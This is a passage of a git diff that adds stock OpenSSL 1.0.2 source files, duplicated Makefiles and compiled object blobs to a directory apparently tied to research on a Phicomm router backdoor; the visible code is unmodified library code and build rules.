zrh~t~TKnxGoce7G;f+LpjPRv|?<Ji2?K#53ME)${eT1JUyr1wl3Ex1t^Ak{jgz@t!
z_=$O(OZd&e_rnj9mvienT4Tf45l+`pm~i@hk8^H~=UqhpHn2n3`6%Hu9-bte_WMJ^
zX}{+Qr_cSj3ExQieV=f;Z#!q9mrQ@6--MkW&e3o9O<(Y4B0q=l79ziyaE0(KgolY9
zI$t{ppG)L3L=V+}lyK_L$8GdHMfg0T|3`%X3E?LRcN3oH9Q{L|7iS4yO5`Q}-38_E
zAbdIDTL}*nzKw9c+~G@(`8Ufr+%chTm;_ImMG4n3Cc*caMfUeb$_>sHei!oQ-#yG2
zpz`12ayu;Y&-3yg3qQ}xhb;V;y!=%QpXB97Ec~~;{7nmYpuv#-j$Nn6JB#zDEgb(|
zfyu+JX8hwC7D@OI8UDoI#h&2;f{VY4UAA!Xcd=ExA0aQkV;{C~@%OU4g^TZyi%<b1
zp+|hjlbSMnhxNz+-1W41-yw2oZ79;jzM3_$FAPlsnT*twPGSMYeNFJyj0rIUIjC%c
z7kv1V)C3>(hBf$@*OW-=S`++fd^!7k#LI(;Y*Q+oOu?tSy<CU3177&?yWamx@_-g}
z1wSs7bhhzal&=p_!QCc`>|GkyT3d;jnKpb0hSbd4<KBa9od_X`b+iQX$Q=kt`nIKC
zQDyCa8C0OoKej#Y(Wn#OiD(l2i?|YXqJMD@Kn3Ql{a?TVL;8VvD_uRMoSA8ZTP6Rc
zK5N$Z@QzR&&XLuBn}DH6GyG_J#ATMano^apTihd1Bl0C7$eiTuDZ{)~b{8-_lJRAO
zA}r;3dk-&*o3LM$aX&<z*7g^8`!-93wf$jeTgiWU3=Bwlc9kUbA3icfdl7$?`o<=n
z*?5(tmw5v;X94`I?Qa5RoqIsi`}6S%XY5+@F0NMpVK<f9A6jm<_zTgH->vQc2j?u>
AqyPW_

literal 0
HcmV?d00001

diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/ts/ts_verify_ctx.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/ts/ts_verify_ctx.c
new file mode 100644
index 0000000..3e6fcb5
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/ts/ts_verify_ctx.c
@@ -0,0 +1,162 @@
+/* crypto/ts/ts_verify_ctx.c */
+/*
+ * Written by Zoltan Glozik (zglozik@stones.com) for the OpenSSL project
+ * 2003.
+ */
+/* ====================================================================
+ * Copyright (c) 2006 The OpenSSL Project.  All rights reserved.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ *
+ * 1. Redistributions of source code must retain the above copyright
+ *    notice, this list of conditions and the following disclaimer.
+ *
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in
+ *    the documentation and/or other materials provided with the
+ *    distribution.
+ *
+ * 3. All advertising materials mentioning features or use of this
+ *    software must display the following acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit. (http://www.OpenSSL.org/)"
+ *
+ * 4. The names "OpenSSL Toolkit" and "OpenSSL Project" must not be used to
+ *    endorse or promote products derived from this software without
+ *    prior written permission. For written permission, please contact
+ *    licensing@OpenSSL.org.
+ *
+ * 5. Products derived from this software may not be called "OpenSSL"
+ *    nor may "OpenSSL" appear in their names without prior written
+ *    permission of the OpenSSL Project.
+ *
+ * 6. Redistributions of any form whatsoever must retain the following
+ *    acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit (http://www.OpenSSL.org/)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY THE OpenSSL PROJECT ``AS IS'' AND ANY
+ * EXPRESSED OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
+ * PURPOSE ARE DISCLAIMED.  IN NO EVENT SHALL THE OpenSSL PROJECT OR
+ * ITS CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
+ * SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
+ * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
+ * LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
+ * STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
+ * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
+ * OF THE POSSIBILITY OF SUCH DAMAGE.
+ * ====================================================================
+ *
+ * This product includes cryptographic software written by Eric Young
+ * (eay@cryptsoft.com).  This product includes software written by Tim
+ * Hudson (tjh@cryptsoft.com).
+ *
+ */
+
+#include "cryptlib.h"
+#include <openssl/objects.h>
+#include <openssl/ts.h>
+
+TS_VERIFY_CTX *TS_VERIFY_CTX_new(void)
+{
+    TS_VERIFY_CTX *ctx =
+        (TS_VERIFY_CTX *)OPENSSL_malloc(sizeof(TS_VERIFY_CTX));
+    if (ctx)
+        memset(ctx, 0, sizeof(TS_VERIFY_CTX));
+    else
+        TSerr(TS_F_TS_VERIFY_CTX_NEW, ERR_R_MALLOC_FAILURE);
+    return ctx;
+}
+
+void TS_VERIFY_CTX_init(TS_VERIFY_CTX *ctx)
+{
+    OPENSSL_assert(ctx != NULL);
+    memset(ctx, 0, sizeof(TS_VERIFY_CTX));
+}
+
+void TS_VERIFY_CTX_free(TS_VERIFY_CTX *ctx)
+{
+    if (!ctx)
+        return;
+
+    TS_VERIFY_CTX_cleanup(ctx);
+    OPENSSL_free(ctx);
+}
+
+void TS_VERIFY_CTX_cleanup(TS_VERIFY_CTX *ctx)
+{
+    if (!ctx)
+        return;
+
+    X509_STORE_free(ctx->store);
+    sk_X509_pop_free(ctx->certs, X509_free);
+
+    ASN1_OBJECT_free(ctx->policy);
+
+    X509_ALGOR_free(ctx->md_alg);
+    OPENSSL_free(ctx->imprint);
+
+    BIO_free_all(ctx->data);
+
+    ASN1_INTEGER_free(ctx->nonce);
+
+    GENERAL_NAME_free(ctx->tsa_name);
+
+    TS_VERIFY_CTX_init(ctx);
+}
+
+TS_VERIFY_CTX *TS_REQ_to_TS_VERIFY_CTX(TS_REQ *req, TS_VERIFY_CTX *ctx)
+{
+    TS_VERIFY_CTX *ret = ctx;
+    ASN1_OBJECT *policy;
+    TS_MSG_IMPRINT *imprint;
+    X509_ALGOR *md_alg;
+    ASN1_OCTET_STRING *msg;
+    const ASN1_INTEGER *nonce;
+
+    OPENSSL_assert(req != NULL);
+    if (ret)
+        TS_VERIFY_CTX_cleanup(ret);
+    else if (!(ret = TS_VERIFY_CTX_new()))
+        return NULL;
+
+    /* Setting flags. */
+    ret->flags = TS_VFY_ALL_IMPRINT & ~(TS_VFY_TSA_NAME | TS_VFY_SIGNATURE);
+
+    /* Setting policy. */
+    if ((policy = TS_REQ_get_policy_id(req)) != NULL) {
+        if (!(ret->policy = OBJ_dup(policy)))
+            goto err;
+    } else
+        ret->flags &= ~TS_VFY_POLICY;
+
+    /* Setting md_alg, imprint and imprint_len. */
+    imprint = TS_REQ_get_msg_imprint(req);
+    md_alg = TS_MSG_IMPRINT_get_algo(imprint);
+    if (!(ret->md_alg = X509_ALGOR_dup(md_alg)))
+        goto err;
+    msg = TS_MSG_IMPRINT_get_msg(imprint);
+    ret->imprint_len = ASN1_STRING_length(msg);
+    if (!(ret->imprint = OPENSSL_malloc(ret->imprint_len)))
+        goto err;
+    memcpy(ret->imprint, ASN1_STRING_data(msg), ret->imprint_len);
+
+    /* Setting nonce. */
+    if ((nonce = TS_REQ_get_nonce(req)) != NULL) {
+        if (!(ret->nonce = ASN1_INTEGER_dup(nonce)))
+            goto err;
+    } else
+        ret->flags &= ~TS_VFY_NONCE;
+
+    return ret;
+ err:
+    if (ctx)
+        TS_VERIFY_CTX_cleanup(ctx);
+    else
+        TS_VERIFY_CTX_free(ret);
+    return NULL;
+}
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/ts/ts_verify_ctx.o b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/ts/ts_verify_ctx.o
new file mode 100644
index 0000000000000000000000000000000000000000..e84c5262384ba7fca69ac6d746beabce7db50089
GIT binary patch
literal 4472
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
Ikj(b~086<jC;$Ke

literal 0
HcmV?d00001

diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/txt_db/Makefile b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/txt_db/Makefile
new file mode 100644
index 0000000..e6f3033
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/txt_db/Makefile
@@ -0,0 +1,84 @@
+#
+# OpenSSL/crypto/txt_db/Makefile
+#
+
+DIR=	txt_db
+TOP=	../..
+CC=	cc
+INCLUDES=
+CFLAG=-g
+MAKEFILE=	Makefile
+AR=		ar r
+
+CFLAGS= $(INCLUDES) $(CFLAG)
+
+GENERAL=Makefile
+TEST=
+APPS=
+
+LIB=$(TOP)/libcrypto.a
+LIBSRC=txt_db.c
+LIBOBJ=txt_db.o
+
+SRC= $(LIBSRC)
+
+EXHEADER= txt_db.h
+HEADER=	$(EXHEADER)
+
+ALL=    $(GENERAL) $(SRC) $(HEADER)
+
+top:
+	(cd ../..; $(MAKE) DIRS=crypto SDIRS=$(DIR) sub_all)
+
+all:	lib
+
+lib:	$(LIBOBJ)
+	$(AR) $(LIB) $(LIBOBJ)
+	$(RANLIB) $(LIB) || echo Never mind.
+	@touch lib
+
+files:
+	$(PERL) $(TOP)/util/files.pl Makefile >> $(TOP)/MINFO
+
+links:
+	@$(PERL) $(TOP)/util/mklink.pl ../../include/openssl $(EXHEADER)
+	@$(PERL) $(TOP)/util/mklink.pl ../../test $(TEST)
+	@$(PERL) $(TOP)/util/mklink.pl ../../apps $(APPS)
+
+install:
+	@[ -n "$(INSTALLTOP)" ] # should be set by top Makefile...
+	@headerlist="$(EXHEADER)"; for i in $$headerlist ; \
+	do  \
+	(cp $$i $(INSTALL_PREFIX)$(INSTALLTOP)/include/openssl/$$i; \
+	chmod 644 $(INSTALL_PREFIX)$(INSTALLTOP)/include/openssl/$$i ); \
+	done;
+
+tags:
+	ctags $(SRC)
+
+tests:
+
+lint:
+	lint -DLINT $(INCLUDES) $(SRC)>fluff
+
+depend:
+	@[ -n "$(MAKEDEPEND)" ] # should be set by top Makefile...
+	$(MAKEDEPEND) -- $(CFLAG) $(INCLUDES) $(DEPFLAG) -- $(PROGS) $(LIBSRC)
+
+dclean:
+	$(PERL) -pe 'if (/^# DO NOT DELETE THIS LINE/) {print; exit(0);}' $(MAKEFILE) >Makefile.new
+	mv -f Makefile.new $(MAKEFILE)
+
+clean:
+	rm -f *.o *.obj lib tags core .pure .nfs* *.old *.bak fluff
+
+# DO NOT DELETE THIS LINE -- make depend depends on it.
+
+txt_db.o: ../../e_os.h ../../include/openssl/bio.h
+txt_db.o: ../../include/openssl/buffer.h ../../include/openssl/crypto.h
+txt_db.o: ../../include/openssl/e_os2.h ../../include/openssl/err.h
+txt_db.o: ../../include/openssl/lhash.h ../../include/openssl/opensslconf.h
+txt_db.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+txt_db.o: ../../include/openssl/safestack.h ../../include/openssl/stack.h
+txt_db.o: ../../include/openssl/symhacks.h ../../include/openssl/txt_db.h
+txt_db.o: ../cryptlib.h txt_db.c
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/txt_db/Makefile.bak b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/txt_db/Makefile.bak
new file mode 100644
index 0000000..e6f3033
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/txt_db/Makefile.bak
@@ -0,0 +1,84 @@
+#
+# OpenSSL/crypto/txt_db/Makefile
+#
+
+DIR=	txt_db
+TOP=	../..
+CC=	cc
+INCLUDES=
+CFLAG=-g
+MAKEFILE=	Makefile
+AR=		ar r
+
+CFLAGS= $(INCLUDES) $(CFLAG)
+
+GENERAL=Makefile
+TEST=
+APPS=
+
+LIB=$(TOP)/libcrypto.a
+LIBSRC=txt_db.c
+LIBOBJ=txt_db.o
+
+SRC= $(LIBSRC)
+
+EXHEADER= txt_db.h
+HEADER=	$(EXHEADER)
+
+ALL=    $(GENERAL) $(SRC) $(HEADER)
+
+top:
+	(cd ../..; $(MAKE) DIRS=crypto SDIRS=$(DIR) sub_all)
+
+all:	lib
+
+lib:	$(LIBOBJ)
+	$(AR) $(LIB) $(LIBOBJ)
+	$(RANLIB) $(LIB) || echo Never mind.
+	@touch lib
+
+files:
+	$(PERL) $(TOP)/util/files.pl Makefile >> $(TOP)/MINFO
+
+links:
+	@$(PERL) $(TOP)/util/mklink.pl ../../include/openssl $(EXHEADER)
+	@$(PERL) $(TOP)/util/mklink.pl ../../test $(TEST)
+	@$(PERL) $(TOP)/util/mklink.pl ../../apps $(APPS)
+
+install:
+	@[ -n "$(INSTALLTOP)" ] # should be set by top Makefile...
+	@headerlist="$(EXHEADER)"; for i in $$headerlist ; \
+	do  \
+	(cp $$i $(INSTALL_PREFIX)$(INSTALLTOP)/include/openssl/$$i; \
+	chmod 644 $(INSTALL_PREFIX)$(INSTALLTOP)/include/openssl/$$i ); \
+	done;
+
+tags:
+	ctags $(SRC)
+
+tests:
+
+lint:
+	lint -DLINT $(INCLUDES) $(SRC)>fluff
+
+depend:
+	@[ -n "$(MAKEDEPEND)" ] # should be set by top Makefile...
+	$(MAKEDEPEND) -- $(CFLAG) $(INCLUDES) $(DEPFLAG) -- $(PROGS) $(LIBSRC)
+
+dclean:
+	$(PERL) -pe 'if (/^# DO NOT DELETE THIS LINE/) {print; exit(0);}' $(MAKEFILE) >Makefile.new
+	mv -f Makefile.new $(MAKEFILE)
+
+clean:
+	rm -f *.o *.obj lib tags core .pure .nfs* *.old *.bak fluff
+
+# DO NOT DELETE THIS LINE -- make depend depends on it.
+
+txt_db.o: ../../e_os.h ../../include/openssl/bio.h
+txt_db.o: ../../include/openssl/buffer.h ../../include/openssl/crypto.h
+txt_db.o: ../../include/openssl/e_os2.h ../../include/openssl/err.h
+txt_db.o: ../../include/openssl/lhash.h ../../include/openssl/opensslconf.h
+txt_db.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+txt_db.o: ../../include/openssl/safestack.h ../../include/openssl/stack.h
+txt_db.o: ../../include/openssl/symhacks.h ../../include/openssl/txt_db.h
+txt_db.o: ../cryptlib.h txt_db.c
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/txt_db/Makefile.save b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/txt_db/Makefile.save
new file mode 100644
index 0000000..e6f3033
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/txt_db/Makefile.save
@@ -0,0 +1,84 @@
+#
+# OpenSSL/crypto/txt_db/Makefile
+#
+
+DIR=	txt_db
+TOP=	../..
+CC=	cc
+INCLUDES=
+CFLAG=-g
+MAKEFILE=	Makefile
+AR=		ar r
+
+CFLAGS= $(INCLUDES) $(CFLAG)
+
+GENERAL=Makefile
+TEST=
+APPS=
+
+LIB=$(TOP)/libcrypto.a
+LIBSRC=txt_db.c
+LIBOBJ=txt_db.o
+
+SRC= $(LIBSRC)
+
+EXHEADER= txt_db.h
+HEADER=	$(EXHEADER)
+
+ALL=    $(GENERAL) $(SRC) $(HEADER)
+
+top:
+	(cd ../..; $(MAKE) DIRS=crypto SDIRS=$(DIR) sub_all)
+
+all:	lib
+
+lib:	$(LIBOBJ)
+	$(AR) $(LIB) $(LIBOBJ)
+	$(RANLIB) $(LIB) || echo Never mind.
+	@touch lib
+
+files:
+	$(PERL) $(TOP)/util/files.pl Makefile >> $(TOP)/MINFO
+
+links:
+	@$(PERL) $(TOP)/util/mklink.pl ../../include/openssl $(EXHEADER)
+	@$(PERL) $(TOP)/util/mklink.pl ../../test $(TEST)
+	@$(PERL) $(TOP)/util/mklink.pl ../../apps $(APPS)
+
+install:
+	@[ -n "$(INSTALLTOP)" ] # should be set by top Makefile...
+	@headerlist="$(EXHEADER)"; for i in $$headerlist ; \
+	do  \
+	(cp $$i $(INSTALL_PREFIX)$(INSTALLTOP)/include/openssl/$$i; \
+	chmod 644 $(INSTALL_PREFIX)$(INSTALLTOP)/include/openssl/$$i ); \
+	done;
+
+tags:
+	ctags $(SRC)
+
+tests:
+
+lint:
+	lint -DLINT $(INCLUDES) $(SRC)>fluff
+
+depend:
+	@[ -n "$(MAKEDEPEND)" ] # should be set by top Makefile...
+	$(MAKEDEPEND) -- $(CFLAG) $(INCLUDES) $(DEPFLAG) -- $(PROGS) $(LIBSRC)
+
+dclean:
+	$(PERL) -pe 'if (/^# DO NOT DELETE THIS LINE/) {print; exit(0);}' $(MAKEFILE) >Makefile.new
+	mv -f Makefile.new $(MAKEFILE)
+
+clean:
+	rm -f *.o *.obj lib tags core .pure .nfs* *.old *.bak fluff
+
+# DO NOT DELETE THIS LINE -- make depend depends on it.
+
+txt_db.o: ../../e_os.h ../../include/openssl/bio.h
+txt_db.o: ../../include/openssl/buffer.h ../../include/openssl/crypto.h
+txt_db.o: ../../include/openssl/e_os2.h ../../include/openssl/err.h
+txt_db.o: ../../include/openssl/lhash.h ../../include/openssl/opensslconf.h
+txt_db.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+txt_db.o: ../../include/openssl/safestack.h ../../include/openssl/stack.h
+txt_db.o: ../../include/openssl/symhacks.h ../../include/openssl/txt_db.h
+txt_db.o: ../cryptlib.h txt_db.c
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/txt_db/lib b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/txt_db/lib
new file mode 100644
index 0000000..e69de29
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/txt_db/txt_db.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/txt_db/txt_db.c
new file mode 100644
index 0000000..f9b42ac
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/txt_db/txt_db.c
@@ -0,0 +1,381 @@
+/* crypto/txt_db/txt_db.c */
+/* Copyright (C) 1995-1998 Eric Young (eay@cryptsoft.com)
+ * All rights reserved.
+ *
+ * This package is an SSL implementation written
+ * by Eric Young (eay@cryptsoft.com).
+ * The implementation was written so as to conform with Netscapes SSL.
+ *
+ * This library is free for commercial and non-commercial use as long as
+ * the following conditions are aheared to.  The following conditions
+ * apply to all code found in this distribution, be it the RC4, RSA,
+ * lhash, DES, etc., code; not just the SSL code.  The SSL documentation
+ * included with this distribution is covered by the same copyright terms
+ * except that the holder is Tim Hudson (tjh@cryptsoft.com).
+ *
+ * Copyright remains Eric Young's, and as such any Copyright notices in
+ * the code are not to be removed.
+ * If this package is used in a product, Eric Young should be given attribution
+ * as the author of the parts of the library used.
+ * This can be in the form of a textual message at program startup or
+ * in documentation (online or textual) provided with the package.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ * 1. Redistributions of source code must retain the copyright
+ *    notice, this list of conditions and the following disclaimer.
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in the
+ *    documentation and/or other materials provided with the distribution.
+ * 3. All advertising materials mentioning features or use of this software
+ *    must display the following acknowledgement:
+ *    "This product includes cryptographic software written by
+ *     Eric Young (eay@cryptsoft.com)"
+ *    The word 'cryptographic' can be left out if the rouines from the library
+ *    being used are not cryptographic related :-).
+ * 4. If you include any Windows specific code (or a derivative thereof) from
+ *    the apps directory (application code) you must include an acknowledgement:
+ *    "This product includes software written by Tim Hudson (tjh@cryptsoft.com)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY ERIC YOUNG ``AS IS'' AND
+ * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
+ * ARE DISCLAIMED.  IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
+ * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
+ * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
+ * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
+ * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
+ * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
+ * SUCH DAMAGE.
+ *
+ * The licence and distribution terms for any publically available version or
+ * derivative of this code cannot be changed.  i.e. this code cannot simply be
+ * copied and put under another distribution licence
+ * [including the GNU Public Licence.]
+ */
+
+#include <stdio.h>
+#include <stdlib.h>
+#include <string.h>
+#include "cryptlib.h"
+#include <openssl/buffer.h>
+#include <openssl/txt_db.h>
+
+#undef BUFSIZE
+#define BUFSIZE 512
+
+const char TXT_DB_version[] = "TXT_DB" OPENSSL_VERSION_PTEXT;
+
+TXT_DB *TXT_DB_read(BIO *in, int num)
+{
+    TXT_DB *ret = NULL;
+    int er = 1;
+    int esc = 0;
+    long ln = 0;
+    int i, add, n;
+    int size = BUFSIZE;
+    int offset = 0;
+    char *p, *f;
+    OPENSSL_STRING *pp;
+    BUF_MEM *buf = NULL;
+
+    if ((buf = BUF_MEM_new()) == NULL)
+        goto err;
+    if (!BUF_MEM_grow(buf, size))
+        goto err;
+
+    if ((ret = OPENSSL_malloc(sizeof(TXT_DB))) == NULL)
+        goto err;
+    ret->num_fields = num;
+    ret->index = NULL;
+    ret->qual = NULL;
+    if ((ret->data = sk_OPENSSL_PSTRING_new_null()) == NULL)
+        goto err;
+    if ((ret->index = OPENSSL_malloc(sizeof(*ret->index) * num)) == NULL)
+        goto err;
+    if ((ret->qual = OPENSSL_malloc(sizeof(*(ret->qual)) * num)) == NULL)
+        goto err;
+    for (i = 0; i < num; i++) {
+        ret->index[i] = NULL;
+        ret->qual[i] = NULL;
+    }
+
+    add = (num + 1) * sizeof(char *);
+    buf->data[size - 1] = '\0';
+    offset = 0;
+    for (;;) {
+        if (offset != 0) {
+            size += BUFSIZE;
+            if (!BUF_MEM_grow_clean(buf, size))
+                goto err;
+        }
+        buf->data[offset] = '\0';
+        BIO_gets(in, &(buf->data[offset]), size - offset);
+        ln++;
+        if (buf->data[offset] == '\0')
+            break;
+        if ((offset == 0) && (buf->data[0] == '#'))
+            continue;
+        i = strlen(&(buf->data[offset]));
+        offset += i;
+        if (buf->data[offset - 1] != '\n')
+            continue;
+        else {
+            buf->data[offset - 1] = '\0'; /* blat the '\n' */
+            if (!(p = OPENSSL_malloc(add + offset)))
+                goto err;
+            offset = 0;
+        }
+        pp = (char **)p;
+        p += add;
+        n = 0;
+        pp[n++] = p;
+        i = 0;
+        f = buf->data;
+
+        esc = 0;
+        for (;;) {
+            if (*f == '\0')
+                break;
+            if (*f == '\t') {
+                if (esc)
+                    p--;
+                else {
+                    *(p++) = '\0';
+                    f++;
+                    if (n >= num)
+                        break;
+                    pp[n++] = p;
+                    continue;
+                }
+            }
+            esc = (*f == '\\');
+            *(p++) = *(f++);
+        }
+        *(p++) = '\0';
+        if ((n != num) || (*f != '\0')) {
+#if !defined(OPENSSL_NO_STDIO) && !defined(OPENSSL_SYS_WIN16) /* temporary
+                                                               * fix :-( */
+            fprintf(stderr,
+                    "wrong number of fields on line %ld (looking for field %d, got %d, '%s' left)\n",
+                    ln, num, n, f);
+#endif
+            er = 2;
+            goto err;
+        }
+        pp[n] = p;
+        if (!sk_OPENSSL_PSTRING_push(ret->data, pp)) {
+#if !defined(OPENSSL_NO_STDIO) && !defined(OPENSSL_SYS_WIN16) /* temporary
+                                                               * fix :-( */
+            fprintf(stderr, "failure in sk_push\n");
+#endif
+            er = 2;
+            goto err;
+        }
+    }
+    er = 0;
+ err:
+    BUF_MEM_free(buf);
+    if (er) {
+#if !defined(OPENSSL_NO_STDIO) && !defined(OPENSSL_SYS_WIN16)
+        if (er == 1)
+            fprintf(stderr, "OPENSSL_malloc failure\n");
+#endif
+        if (ret != NULL) {
+            if (ret->data != NULL)
+                sk_OPENSSL_PSTRING_free(ret->data);
+            if (ret->index != NULL)
+                OPENSSL_free(ret->index);
+            if (ret->qual != NULL)
+                OPENSSL_free(ret->qual);
+            if (ret != NULL)
+                OPENSSL_free(ret);
+        }
+        return (NULL);
+    } else
+        return (ret);
+}
+
+OPENSSL_STRING *TXT_DB_get_by_index(TXT_DB *db, int idx,
+                                    OPENSSL_STRING *value)
+{
+    OPENSSL_STRING *ret;
+    LHASH_OF(OPENSSL_STRING) *lh;
+
+    if (idx >= db->num_fields) {
